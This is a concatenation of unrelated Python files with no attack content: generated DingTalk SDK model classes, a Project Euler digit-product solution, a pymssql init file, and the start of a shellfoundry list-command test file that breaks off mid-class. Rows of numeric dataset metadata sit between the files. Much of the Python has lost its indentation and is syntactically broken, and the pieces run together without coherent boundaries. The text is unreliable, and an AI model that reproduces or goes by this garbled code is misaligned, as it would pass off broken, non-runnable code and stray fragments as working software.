group_members_count_end: int = None,
sync_to_dingpan: int = None,
group_owner: str = None,
create_time_end: int = None,
page_size: int = None,
create_time_start: int = None,
uuid: str = None,
group_members_count_start: int = None,
last_active_time_end: int = None,
operator_user_id: str = None,
group_name: str = None,
page_start: int = None,
last_active_time_start: int = None,
):
# groupMembersCntEnd
self.group_members_count_end = group_members_count_end
# syncToDingpan
self.sync_to_dingpan = sync_to_dingpan
# groupOwner
self.group_owner = group_owner
# createTimeEnd
self.create_time_end = create_time_end
# pageSize
self.page_size = page_size
# createTimeStart
self.create_time_start = create_time_start
# uuid
self.uuid = uuid
# groupMembersCntStart
self.group_members_count_start = group_members_count_start
# lastActiveTimeEnd
self.last_active_time_end = last_active_time_end
# operatorUserId
self.operator_user_id = operator_user_id
# groupName
self.group_name = group_name
# pageStart
self.page_start = page_start
# lastActiveTimeStart
self.last_active_time_start = last_active_time_start
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.group_members_count_end is not None:
result['groupMembersCountEnd'] = self.group_members_count_end
if self.sync_to_dingpan is not None:
result['syncToDingpan'] = self.sync_to_dingpan
if self.group_owner is not None:
result['groupOwner'] = self.group_owner
if self.create_time_end is not None:
result['createTimeEnd'] = self.create_time_end
if self.page_size is not None:
result['pageSize'] = self.page_size
if self.create_time_start is not None:
result['createTimeStart'] = self.create_time_start
if self.uuid is not None:
result['uuid'] = self.uuid
if self.group_members_count_start is not None:
result['groupMembersCountStart'] = self.group_members_count_start
if self.last_active_time_end is not None:
result['lastActiveTimeEnd'] = self.last_active_time_end
if self.operator_user_id is not None:
result['operatorUserId'] = self.operator_user_id
if self.group_name is not None:
result['groupName'] = self.group_name
if self.page_start is not None:
result['pageStart'] = self.page_start
if self.last_active_time_start is not None:
result['lastActiveTimeStart'] = self.last_active_time_start
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('groupMembersCountEnd') is not None:
self.group_members_count_end = m.get('groupMembersCountEnd')
if m.get('syncToDingpan') is not None:
self.sync_to_dingpan = m.get('syncToDingpan')
if m.get('groupOwner') is not None:
self.group_owner = m.get('groupOwner')
if m.get('createTimeEnd') is not None:
self.create_time_end = m.get('createTimeEnd')
if m.get('pageSize') is not None:
self.page_size = m.get('pageSize')
if m.get('createTimeStart') is not None:
self.create_time_start = m.get('createTimeStart')
if m.get('uuid') is not None:
self.uuid = m.get('uuid')
if m.get('groupMembersCountStart') is not None:
self.group_members_count_start = m.get('groupMembersCountStart')
if m.get('lastActiveTimeEnd') is not None:
self.last_active_time_end = m.get('lastActiveTimeEnd')
if m.get('operatorUserId') is not None:
self.operator_user_id = m.get('operatorUserId')
if m.get('groupName') is not None:
self.group_name = m.get('groupName')
if m.get('pageStart') is not None:
self.page_start = m.get('pageStart')
if m.get('lastActiveTimeStart') is not None:
self.last_active_time_start = m.get('lastActiveTimeStart')
return self
class SearchOrgInnerGroupInfoResponseBodyItems(TeaModel):
def __init__(
self,
open_conversation_id: str = None,
group_owner: str = None,
group_name: str = None,
group_admins_count: int = None,
group_members_count: int = None,
group_create_time: int = None,
group_last_active_time: int = None,
group_last_active_time_show: str = None,
sync_to_dingpan: int = None,
used_quota: int = None,
group_owner_user_id: str = None,
status: int = None,
template_id: str = None,
template_name: str = None,
):
self.open_conversation_id = open_conversation_id
self.group_owner = group_owner
self.group_name = group_name
self.group_admins_count = group_admins_count
self.group_members_count = group_members_count
self.group_create_time = group_create_time
self.group_last_active_time = group_last_active_time
self.group_last_active_time_show = group_last_active_time_show
self.sync_to_dingpan = sync_to_dingpan
self.used_quota = used_quota
self.group_owner_user_id = group_owner_user_id
self.status = status
self.template_id = template_id
self.template_name = template_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.open_conversation_id is not None:
result['openConversationId'] = self.open_conversation_id
if self.group_owner is not None:
result['groupOwner'] = self.group_owner
if self.group_name is not None:
result['groupName'] = self.group_name
if self.group_admins_count is not None:
result['groupAdminsCount'] = self.group_admins_count
if self.group_members_count is not None:
result['groupMembersCount'] = self.group_members_count
if self.group_create_time is not None:
result['groupCreateTime'] = self.group_create_time
if self.group_last_active_time is not None:
result['groupLastActiveTime'] = self.group_last_active_time
if self.group_last_active_time_show is not None:
result['groupLastActiveTimeShow'] = self.group_last_active_time_show
if self.sync_to_dingpan is not None:
result['syncToDingpan'] = self.sync_to_dingpan
if self.used_quota is not None:
result['usedQuota'] = self.used_quota
if self.group_owner_user_id is not None:
result['groupOwnerUserId'] = self.group_owner_user_id
if self.status is not None:
result['status'] = self.status
if self.template_id is not None:
result['templateId'] = self.template_id
if self.template_name is not None:
result['templateName'] = self.template_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('openConversationId') is not None:
self.open_conversation_id = m.get('openConversationId')
if m.get('groupOwner') is not None:
self.group_owner = m.get('groupOwner')
if m.get('groupName') is not None:
self.group_name = m.get('groupName')
if m.get('groupAdminsCount') is not None:
self.group_admins_count = m.get('groupAdminsCount')
if m.get('groupMembersCount') is not None:
self.group_members_count = m.get('groupMembersCount')
if m.get('groupCreateTime') is not None:
self.group_create_time = m.get('groupCreateTime')
if m.get('groupLastActiveTime') is not None:
self.group_last_active_time = m.get('groupLastActiveTime')
if m.get('groupLastActiveTimeShow') is not None:
self.group_last_active_time_show = m.get('groupLastActiveTimeShow')
if m.get('syncToDingpan') is not None:
self.sync_to_dingpan = m.get('syncToDingpan')
if m.get('usedQuota') is not None:
self.used_quota = m.get('usedQuota')
if m.get('groupOwnerUserId') is not None:
self.group_owner_user_id = m.get('groupOwnerUserId')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('templateId') is not None:
self.template_id = m.get('templateId')
if m.get('templateName') is not None:
self.template_name = m.get('templateName')
return self
class SearchOrgInnerGroupInfoResponseBody(TeaModel):
def __init__(
self,
total_count: int = None,
item_count: int = None,
items: List[SearchOrgInnerGroupInfoResponseBodyItems] = None,
):
self.total_count = total_count
self.item_count = item_count
self.items = items
def validate(self):
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.total_count is not None:
result['totalCount'] = self.total_count
if self.item_count is not None:
result['itemCount'] = self.item_count
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('totalCount') is not None:
self.total_count = m.get('totalCount')
if m.get('itemCount') is not None:
self.item_count = m.get('itemCount')
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = SearchOrgInnerGroupInfoResponseBodyItems()
self.items.append(temp_model.from_map(k))
return self
class SearchOrgInnerGroupInfoResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: SearchOrgInnerGroupInfoResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = SearchOrgInnerGroupInfoResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class SendInvitationHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class SendInvitationRequest(TeaModel):
def __init__(
self,
dept_id: str = None,
partner_num: str = None,
partner_label_id: int = None,
phone: str = None,
org_alias: str = None,
):
        # Department ID
        self.dept_id = dept_id
        # Partner number
        self.partner_num = partner_num
        # Partner label ID
        self.partner_label_id = partner_label_id
        # Phone number
        self.phone = phone
        # Organization alias
        self.org_alias = org_alias
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.dept_id is not None:
result['deptId'] = self.dept_id
if self.partner_num is not None:
result['partnerNum'] = self.partner_num
if self.partner_label_id is not None:
result['partnerLabelId'] = self.partner_label_id
if self.phone is not None:
result['phone'] = self.phone
if self.org_alias is not None:
result['orgAlias'] = self.org_alias
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deptId') is not None:
self.dept_id = m.get('deptId')
if m.get('partnerNum') is not None:
self.partner_num = m.get('partnerNum')
if m.get('partnerLabelId') is not None:
self.partner_label_id = m.get('partnerLabelId')
if m.get('phone') is not None:
self.phone = m.get('phone')
if m.get('orgAlias') is not None:
self.org_alias = m.get('orgAlias')
return self
class SendInvitationResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
):
self.headers = headers
def validate(self):
self.validate_required(self.headers, 'headers')
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
return self
class GetGroupActiveInfoHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetGroupActiveInfoRequest(TeaModel):
def __init__(
self,
stat_date: str = None,
ding_group_id: str = None,
page_number: int = None,
page_size: int = None,
):
        # Statistics date
        self.stat_date = stat_date
        # DingTalk group ID
        self.ding_group_id = ding_group_id
        # Starting page number
        self.page_number = page_number
        # Page size
        self.page_size = page_size
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.stat_date is not None:
result['statDate'] = self.stat_date
if self.ding_group_id is not None:
result['dingGroupId'] = self.ding_group_id
if self.page_number is not None:
result['pageNumber'] = self.page_number
if self.page_size is not None:
result['pageSize'] = self.page_size
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('statDate') is not None:
self.stat_date = m.get('statDate')
if m.get('dingGroupId') is not None:
self.ding_group_id = m.get('dingGroupId')
if m.get('pageNumber') is not None:
self.page_number = m.get('pageNumber')
if m.get('pageSize') is not None:
self.page_size = m.get('pageSize')
return self
class GetGroupActiveInfoResponseBodyData(TeaModel):
def __init__(
self,
stat_date: str = None,
ding_group_id: str = None,
group_create_time: str = None,
group_create_user_id: str = None,
group_create_user_name: str = None,
group_name: str = None,
group_type: int = None,
group_user_cnt_1d: int = None,
send_message_user_cnt_1d: int = None,
send_message_cnt_1d: int = None,
open_conv_uv_1d: int = None,
):
        # Statistics date
        self.stat_date = stat_date
        # Group ID
        self.ding_group_id = ding_group_id
        # Group creation time
        self.group_create_time = group_create_time
        # User ID of the group creator
        self.group_create_user_id = group_create_user_id
        # Name of the group creator
        self.group_create_user_name = group_create_user_name
        # Group name
        self.group_name = group_name
        # Group type: 1 = all-staff group, 2 = department group, 3 = (other) internal group, 4 = scene group
        self.group_type = group_type
        # Number of group members in the last 1 day
        self.group_user_cnt_1d = group_user_cnt_1d
        # Number of users who sent messages in the last 1 day
        self.send_message_user_cnt_1d = send_message_user_cnt_1d
        # Number of messages sent in the last 1 day
        self.send_message_cnt_1d = send_message_cnt_1d
        # Number of users who opened the group chat in the last 1 day
        self.open_conv_uv_1d = open_conv_uv_1d
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.stat_date is not None:
result['statDate'] = self.stat_date
if self.ding_group_id is not None:
result['dingGroupId'] = self.ding_group_id
if self.group_create_time is not None:
result['groupCreateTime'] = self.group_create_time
if self.group_create_user_id is not None:
result['groupCreateUserId'] = self.group_create_user_id
if self.group_create_user_name is not None:
result['groupCreateUserName'] = self.group_create_user_name
if self.group_name is not None:
result['groupName'] = self.group_name
if self.group_type is not None:
result['groupType'] = self.group_type
if self.group_user_cnt_1d is not None:
result['groupUserCnt1d'] = self.group_user_cnt_1d
if self.send_message_user_cnt_1d is not None:
result['sendMessageUserCnt1d'] = self.send_message_user_cnt_1d
if self.send_message_cnt_1d is not None:
result['sendMessageCnt1d'] = self.send_message_cnt_1d
if self.open_conv_uv_1d is not None:
result['openConvUv1d'] = self.open_conv_uv_1d
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('statDate') is not None:
self.stat_date = m.get('statDate')
if m.get('dingGroupId') is not None:
self.ding_group_id = m.get('dingGroupId')
if m.get('groupCreateTime') is not None:
self.group_create_time = m.get('groupCreateTime')
if m.get('groupCreateUserId') is not None:
self.group_create_user_id = m.get('groupCreateUserId')
if m.get('groupCreateUserName') is not None:
self.group_create_user_name = m.get('groupCreateUserName')
if m.get('groupName') is not None:
self.group_name = m.get('groupName')
if m.get('groupType') is not None:
self.group_type = m.get('groupType')
if m.get('groupUserCnt1d') is not None:
self.group_user_cnt_1d = m.get('groupUserCnt1d')
if m.get('sendMessageUserCnt1d') is not None:
self.send_message_user_cnt_1d = m.get('sendMessageUserCnt1d')
if m.get('sendMessageCnt1d') is not None:
self.send_message_cnt_1d = m.get('sendMessageCnt1d')
if m.get('openConvUv1d') is not None:
self.open_conv_uv_1d = m.get('openConvUv1d')
return self
class GetGroupActiveInfoResponseBody(TeaModel):
def __init__(
self,
data: List[GetGroupActiveInfoResponseBodyData] = None,
total_count: int = None,
):
self.data = data
self.total_count = total_count
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
if self.total_count is not None:
result['totalCount'] = self.total_count
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetGroupActiveInfoResponseBodyData()
self.data.append(temp_model.from_map(k))
if m.get('totalCount') is not None:
self.total_count = m.get('totalCount')
return self
class GetGroupActiveInfoResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetGroupActiveInfoResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetGroupActiveInfoResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetCommentListHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetCommentListRequest(TeaModel):
def __init__(
self,
page_number: int = None,
page_size: int = None,
):
        # Starting page number
        self.page_number = page_number
        # Page size
        self.page_size = page_size
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.page_number is not None:
result['pageNumber'] = self.page_number
if self.page_size is not None:
result['pageSize'] = self.page_size
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('pageNumber') is not None:
self.page_number = m.get('pageNumber')
if m.get('pageSize') is not None:
self.page_size = m.get('pageSize')
return self
class GetCommentListResponseBodyData(TeaModel):
def __init__(
self,
comment_user_name: str = None,
content: str = None,
comment_time: float = None,
comment_id: str = None,
):
        # Commenter name
        self.comment_user_name = comment_user_name
        # Comment content
        self.content = content
        # Comment time
        self.comment_time = comment_time
        # Comment ID
        self.comment_id = comment_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.comment_user_name is not None:
result['commentUserName'] = self.comment_user_name
if self.content is not None:
result['content'] = self.content
if self.comment_time is not None:
result['commentTime'] = self.comment_time
if self.comment_id is not None:
result['commentId'] = self.comment_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commentUserName') is not None:
self.comment_user_name = m.get('commentUserName')
if m.get('content') is not None:
self.content = m.get('content')
if m.get('commentTime') is not None:
self.comment_time = m.get('commentTime')
if m.get('commentId') is not None:
self.comment_id = m.get('commentId')
return self
class GetCommentListResponseBody(TeaModel):
def __init__(
self,
data: List[GetCommentListResponseBodyData] = None,
total_count: int = None,
):
self.data = data
self.total_count = total_count
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
if self.total_count is not None:
result['totalCount'] = self.total_count
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetCommentListResponseBodyData()
self.data.append(temp_model.from_map(k))
if m.get('totalCount') is not None:
self.total_count = m.get('totalCount')
return self
class GetCommentListResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetCommentListResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetCommentListResponseBody()
self.body = temp_model.from_map(m['body'])
return self
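# Added illustration: the serialization round trip that every TeaModel in this
# file follows. to_map() emits the camelCase wire-format dict and from_map()
# repopulates a model from such a dict, so a round trip preserves all set
# fields. A minimal self-check using one of the models defined above:
def _demo_round_trip():
    request = GetCommentListRequest(page_number=1, page_size=20)
    wire = request.to_map()  # {'pageNumber': 1, 'pageSize': 20}
    restored = GetCommentListRequest().from_map(wire)
    assert restored.page_number == 1 and restored.page_size == 20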
# ===== File: solved_problems/8_Largest product in a series.py (anajulijapreseren/Project_Euler, MIT) =====
# The four adjacent digits in the 1000-digit number that have the greatest product are 9 × 9 × 8 × 9 = 5832.
##
#73167176531330624919225119674426574742355349194934
#96983520312774506326239578318016984801869478851843
#85861560789112949495459501737958331952853208805511
#12540698747158523863050715693290963295227443043557
#66896648950445244523161731856403098711121722383113
#62229893423380308135336276614282806444486645238749
#30358907296290491560440772390713810515859307960866
#70172427121883998797908792274921901699720888093776
#65727333001053367881220235421809751254540594752243
#52584907711670556013604839586446706324415722155397
#53697817977846174064955149290862569321978468622482
#83972241375657056057490261407972968652414535100474
#82166370484403199890008895243450658541227588666881
#16427171479924442928230863465674813919123162824586
#17866458359124566529476545682848912883142607690042
#24219022671055626321111109370544217506941658960408
#07198403850962455444362981230987879927244284909188
#84580156166097919133875499200524063689912560717606
#05886116467109405077541002256983155200055935729725
#71636269561882670428252483600823257530420752963450
##
#Find the thirteen adjacent digits in the 1000-digit number that have the greatest product.
#What is the value of this product?
def naredi_seznam(n):
"""dobimo seznam, ki vsebuje posamezne cifre števila"""
sez = []
while n > 9:
ostanek = n % 10
n = n // 10
sez.append(ostanek)
sez.append(n)
return sez[::-1]
def the_greatest_product_13(n):
    """Return the greatest product of 13 adjacent digits of n."""
    sez = naredi_seznam(n)
    max_product = 0
    while len(sez) >= 13:
        new_product = 1
        for i in sez[:13]:
            new_product *= i
        max_product = max(max_product, new_product)
        sez = sez[1:]  # slide the 13-digit window one position forward
    return max_product
num = int("""
73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450""".replace("\n", ""))
print(the_greatest_product_13(num))
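# Added alternative sketch (not part of the original solution): the version
# above copies the list on every `sez = sez[1:]` step, which is quadratic in
# the input length; scanning the digit string directly keeps a single pass
# over the windows.
def greatest_product(digits: str, window: int = 13) -> int:
    best = 0
    for i in range(len(digits) - window + 1):
        product = 1
        for d in digits[i:i + window]:
            product *= int(d)
        best = max(best, product)
    return best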
# ===== File: env/Lib/site-packages/pymssql/__init__.py (acadianshadow237/BA_MDI1, MIT) =====
# -*- coding: utf-8 -*-
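# The package init simply re-exports the public API of the compiled _pymssql extension.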
from ._pymssql import *
from ._pymssql import __version__, __full_version__
| 20.2
| 51
| 0.722772
| 12
| 101
| 5.166667
| 0.666667
| 0.354839
| 0.548387
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011628
| 0.148515
| 101
| 4
| 52
| 25.25
| 0.709302
| 0.207921
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6cfd1c381d03faefe1c211c47421747c073f1825
| 27,581
|
py
|
Python
|
tests/test_commands/test_list_command.py
|
p-sherratt/shellfoundry
|
d1f35a31123b9e701c801345fb633b6fda5420b7
|
[
"Apache-2.0"
] | null | null | null |
tests/test_commands/test_list_command.py
|
p-sherratt/shellfoundry
|
d1f35a31123b9e701c801345fb633b6fda5420b7
|
[
"Apache-2.0"
] | 1
|
2021-03-25T23:21:02.000Z
|
2021-03-25T23:21:02.000Z
|
tests/test_commands/test_list_command.py
|
p-sherratt/shellfoundry
|
d1f35a31123b9e701c801345fb633b6fda5420b7
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import unittest
import httpretty
from pyfakefs import fake_filesystem_unittest
from click import UsageError, ClickException
from mock import Mock, MagicMock, patch
from requests.exceptions import SSLError
from cloudshell.rest.api import FeatureUnavailable
from shellfoundry.commands.list_command import ListCommandExecutor
from shellfoundry.models.shell_template import ShellTemplate
from shellfoundry.utilities.template_retriever import FilteredTemplateRetriever, TemplateRetriever, TEMPLATES_YML
class TestListCommand(unittest.TestCase):
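    """Tests for the shellfoundry "list" command: table rendering and gen1/gen2 filtering."""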
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_single_template_is_displayed(self, max_width_mock, echo_mock):
# Arrange
        max_width_mock.return_value = 62  # mock the max column width so the expected
        # output does not depend on the actual console size
template_retriever = Mock()
template_retriever.get_templates = Mock(
return_value={'gen1/base': [ShellTemplate('gen1/base', 'description', '', '7.0')]})
standards = Mock()
standards.fetch.return_value = {}
list_command_executor = ListCommandExecutor(template_retriever=template_retriever, standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_any_call(u' Template Name CloudShell Ver. Description \n'
u'---------------------------------------------\n'
u' gen1/base 7.0 and up description ')
@patch('shellfoundry.commands.list_command.Configuration')
def test_shows_informative_message_when_offline(self, conf_class):
# Arrange
configuration = MagicMock(read=MagicMock(return_value=MagicMock(online_mode="True")))
conf_class.return_value = configuration
template_retriever = Mock()
template_retriever.get_templates.side_effect = SSLError()
list_command_executor = ListCommandExecutor(template_retriever=template_retriever,
standards=Mock())
# Assert
self.assertRaisesRegexp(UsageError, "offline", list_command_executor.list)
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_two_templates_are_displayed(self, max_width_mock, echo_mock):
# Arrange
        max_width_mock.return_value = 62  # mock the max column width so the expected
        # output does not depend on the actual console size
template_retriever = Mock()
template_retriever.get_templates = Mock(return_value={
'gen1/base': [ShellTemplate('gen1/base', 'base description', '', '7.0', 'base')],
'gen1/switch': [ShellTemplate('gen1/switch', 'switch description', '', '7.0')]})
standards = Mock()
standards.fetch.return_value = {}
list_command_executor = ListCommandExecutor(template_retriever=template_retriever, standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_any_call(
u' Template Name CloudShell Ver. Description \n'
u'----------------------------------------------------\n'
u' gen1/base 7.0 and up base description \n'
u' gen1/switch 7.0 and up switch description ')
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_two_long_named_templates_are_displayed_on_normal_window(self, max_width_mock, echo_mock):
# Arrange
        max_width_mock.return_value = 40  # mock the max column width so the expected
        # output does not depend on the actual console size
template_retriever = Mock()
template_retriever.get_templates = Mock(return_value={
'gen2/networking/switch': [ShellTemplate('gen2/networking/switch',
'TOSCA based template for standard Switch devices/virtual appliances',
'', '8.0')],
'gen2/networking/WirelessController': [ShellTemplate('gen2/networking/WirelessController',
'TOSCA based template for standard WirelessController devices/virtual appliances',
'', '8.0')]})
standards = Mock()
standards.fetch.return_value = {}
list_command_executor = ListCommandExecutor(template_retriever=template_retriever, standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_any_call(
u' Template Name CloudShell Ver. Description \n'
u'-----------------------------------------------------------------------------------------------\n'
u' gen2/networking/WirelessController 8.0 and up TOSCA based template for standard \n'
u' WirelessController devices/virtual \n'
u' appliances \n'
u' gen2/networking/switch 8.0 and up TOSCA based template for standard Switch \n'
u' devices/virtual appliances '
)
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_console_size_small_description_wrapping_logic_ignored(self, max_width_mock, echo_mock):
# Arrange
max_width_mock.return_value = 0
template_retriever = Mock()
template_retriever.get_templates = Mock(return_value={
'gen2/networking/switch': [ShellTemplate('gen2/networking/switch',
'TOSCA based template for standard Switch devices/virtual appliances',
'', '8.0')],
'gen2/networking/WirelessController': [ShellTemplate('gen2/networking/WirelessController',
'TOSCA based template for standard WirelessController devices/virtual appliances',
'', '8.0')]})
standards = Mock()
standards.fetch.return_value = {"networking": ['2.0.0'],
"resource": ['5.0.0', '5.0.1'],
"vido": ['3.0.1', '3.0.2', '3.0.3']}
list_command_executor = ListCommandExecutor(template_retriever=template_retriever, standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_called_once_with(
u' Template Name CloudShell Ver. Description \n'
u'--------------------------------------------------------------------------------------------------------------------------------------\n'
u' gen2/networking/WirelessController 8.0 and up TOSCA based template for standard WirelessController devices/virtual appliances \n'
u' gen2/networking/switch 8.0 and up TOSCA based template for standard Switch devices/virtual appliances '
)
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_filter_by_tosca_shows_all_tosca_templates(self, max_width_mock, echo_mock):
# Arrange
max_width_mock.return_value = 40
template_retriever = Mock()
template_retriever.get_templates = Mock(return_value={
'gen2/networking/switch': [ShellTemplate('gen2/networking/switch',
'TOSCA based template for standard Switch devices/virtual appliances',
'', '8.0')],
'gen2/networking/WirelessController': [ShellTemplate('gen2/networking/WirelessController',
'TOSCA based template for standard WirelessController devices/virtual appliances',
'', '8.0')],
'gen1/base': [ShellTemplate('gen1/base', 'base description', '', '7.0')],
'gen1/switch': [ShellTemplate('gen1/switch', 'switch description', '', '7.0')]})
flag_value = 'gen2'
standards = Mock()
standards.fetch.return_value = {}
list_command_executor = ListCommandExecutor(
template_retriever=FilteredTemplateRetriever(flag_value, template_retriever), standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_any_call(
u' Template Name CloudShell Ver. Description \n'
u'-----------------------------------------------------------------------------------------------\n'
u' gen2/networking/WirelessController 8.0 and up TOSCA based template for standard \n'
u' WirelessController devices/virtual \n'
u' appliances \n'
u' gen2/networking/switch 8.0 and up TOSCA based template for standard Switch \n'
u' devices/virtual appliances ')
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
